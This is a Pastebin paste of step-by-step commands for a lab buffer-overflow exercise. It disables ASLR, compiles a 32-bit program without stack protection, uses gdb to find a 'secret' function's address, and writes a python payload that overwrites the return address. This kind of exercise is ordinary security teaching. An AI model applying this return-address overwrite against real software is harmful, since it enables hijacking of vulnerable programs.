API tools faq
paste
Advertisement
Guest User

boa

a guest
Mar 19th, 2019
82
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.58 KB | None | 0 0
raw download clone embed print report
  1. sudo sysctl -w kernel.randomize_va_space=0
  2.  
  3. touch main.c
  4.  
  5. gedit main.c
  6.  
  7. getconf LONG_BIT
  8.  
  9. gcc -g -m32 -fno-stack-protector -mpreferred-stack-boundary=2 main.c -o boa
  10.  
  11. ./boa
  12.  
  13. [give inputs]
  14.  
  15. gdb boa
  16.  
  17. list
  18.  
  19. b 12
  20.  
  21. disass main
  22.  
  23. [target mem location after call function 0x0804846b]
  24.  
  25. run
  26.  
  27. [give inputs]
  28.  
  29. x/20x $esp
  30.  
  31. quit
  32.  
  33. gdb boa
  34.  
  35. disass secret
  36.  
  37. [0x0804843b] starting address of secret
  38.  
  39. [Open another terminal]
  40. python -c 'print "a"*8+"\x3b\x84\x04\x08"'
  41.  
  42. python -c 'print "a"*8+"\x3b\x84\x04\x08"' > input
  43.  
  44. cat input
  45. [Done for 2nd terminal]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!